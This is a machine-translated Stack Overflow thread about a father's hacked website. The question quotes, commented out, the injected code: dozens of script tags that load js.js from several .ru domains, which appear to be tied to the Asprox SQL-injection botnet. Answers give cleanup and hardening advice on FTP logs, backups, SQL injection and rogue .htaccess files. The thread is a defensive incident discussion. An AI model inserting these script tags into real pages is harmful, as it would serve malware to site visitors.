我的网站被黑了..我应该怎么办?[关闭]
https://stackoverflow.com/questions/2970
italiano
english
français
española
中国
日本の
العربية
Deutsch
한국어
Português
Russian题
我爸爸今天打电话给我,说访问他网站的人收到了 168 个病毒,试图下载到他们的计算机上。他根本不懂技术,而是用所见即所得的编辑器构建了整个东西。
我打开他的网站并查看源代码,在源代码底部的 HTML 结束标记之前有一行 Javascript 包含内容。他们包括这个文件(以及许多其他文件): http://www.98hs.ru/js.js <-- 在访问该 URL 之前,请关闭 JavaScript。
所以我暂时把它注释掉了。事实证明,他的 FTP 密码是一个简单的字典单词,长度为 6 个字母,因此我们认为这就是它被黑客入侵的原因。我们已将他的密码更改为 8 位以上的非单词字符串(他不会选择密码,因为他是一个喜欢打字的人)。
我做了一个 98hs.ru 上的 WHOIS 并发现它是由智利的服务器托管的。实际上也有一个与之相关的电子邮件地址,但我严重怀疑这个人就是罪魁祸首。可能只是其他一些被黑客攻击的网站......
我现在不知道该怎么办,因为我以前从未处理过此类事情。有人有什么建议吗?
他通过 webhost4life.com 使用简单的、不安全的 ftp。我什至没有看到办法 做 他们网站上的 sftp。我想他的用户名和密码被截获了?
那么,为了使其与社区更相关,您应该采取哪些步骤/应该遵循哪些最佳实践来保护您的网站免遭黑客攻击?
作为记录,这是“神奇地”添加到他的文件中的代码行(并且不在他计算机上的文件中 - 我将其注释掉只是为了绝对确保它不会执行任何操作在此页面上,尽管我确信杰夫会防止这一点):
<!--script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script-->
解决方案
尝试收集尽可能多的信息。查看主机是否可以为您提供一个日志,显示与您的帐户建立的所有 FTP 连接。您可以使用这些来查看是否是用于进行更改并可能获取 IP 地址的 FTP 连接。
如果您使用的是预打包软件,例如 Wordpress、Drupal 或其他任何您没有编写代码的软件,则上传代码中可能存在允许此类修改的漏洞。如果是定制的,请仔细检查允许用户上传文件或修改现有文件的所有位置。
第二件事是按原样转储站点并检查所有内容是否有其他修改。这可能只是他们所做的一项修改,但如果他们通过 FTP 进入,谁知道上面还有什么。
将您的站点恢复到已知的良好状态,并根据需要升级到最新版本。
您还必须考虑一定程度的回报。损害是否值得尝试追踪此人,还是您只是生活、学习和使用更强的密码?
其他提示
我知道这有点晚了,但是 JavaScript 提到的 URL 在已知是 6 月份开始的 ASPRox 机器人复兴的一部分的网站列表中提到了(至少在那时我们被标记为它)。下面提到了有关它的一些细节:
http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx
令人讨厌的事情是,实际上数据库中的每个 varchar 类型字段都被“感染”,以吐出对此 URL 的引用,其中浏览器会获得一个微小的 iframe,将其变成机器人。可以在此处找到对此问题的基本 SQL 修复:
http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx
但可怕的是,病毒会在系统表中查找要感染的值,并且许多共享托管计划也为其客户端共享数据库空间。因此,很可能甚至不是您父亲的网站被感染,而是他的托管集群中其他人的网站编写了一些糟糕的代码并为 SQL 注入攻击打开了大门。
如果他还没有这样做,我会向他们的主机发送一封紧急电子邮件,并为他们提供一个 SQL 代码的链接,以修复整个系统。您可以修复自己受影响的数据库表,但很可能进行感染的机器人将再次穿过该漏洞并感染整个数据库。
希望这能为您提供更多可供使用的信息。
编辑:再快速思考一下,如果他使用其中一个主机在线设计工具来构建他的网站,所有这些内容可能都位于一个列中并以这种方式被感染。
你提到你爸爸正在使用网站发布工具。
如果发布工具从他的电脑发布到服务器,可能他的本地文件是干净的,他只需要重新发布到服务器即可。
不过,他应该看看他的服务器是否有不同于普通 FTP 的登录方法......这不是很安全,因为它通过互联网以明文形式发送他的密码。
该网站只是纯静态 HTML 吗?IE。他还没有设法为自己编写一个上传页面,允许任何路过的人上传受损的脚本/页面?
为什么不询问 webhost4life 是否有可用的 FTP 日志并向他们报告问题。你永远不知道,他们可能会很乐意为你找出到底发生了什么?
我在一家共享托管服务商工作,我们总是欢迎此类报告,并且通常可以查明确切的攻击向量,并就客户出错的地方提出建议。
拔掉网络服务器而不关闭它以避免关闭脚本。通过另一台计算机作为数据驱动器来分析硬盘,看看是否可以通过日志文件和类似性质的东西来确定罪魁祸首。验证代码是否安全,然后从备份中恢复。
我最近在 ipower 上托管的一个客户就发生了这种情况。我不确定您的托管环境是否是基于 Apache 的,但如果确实如此,请务必仔细检查您未创建的 .htaccess 文件,特别是在 webroot 之上和图像目录内部,因为它们往往会在那里注入一些肮脏的内容(他们根据人们在推荐中的来源来重定向人们)。另请检查您为非您编写的代码创建的任何内容。
显然我们是被同一个人黑客攻击的!在我们的例子中,或者是机器人。他们在一些不再有人维护的旧经典 ASP 站点上的 URL 中使用了 SQL 注入。我们发现了攻击IP并在IIS中阻止了它们。现在我们必须重构所有旧的 ASP。因此,我的建议是首先查看 IIS 日志,找出问题是否出在您站点的代码或服务器配置中。
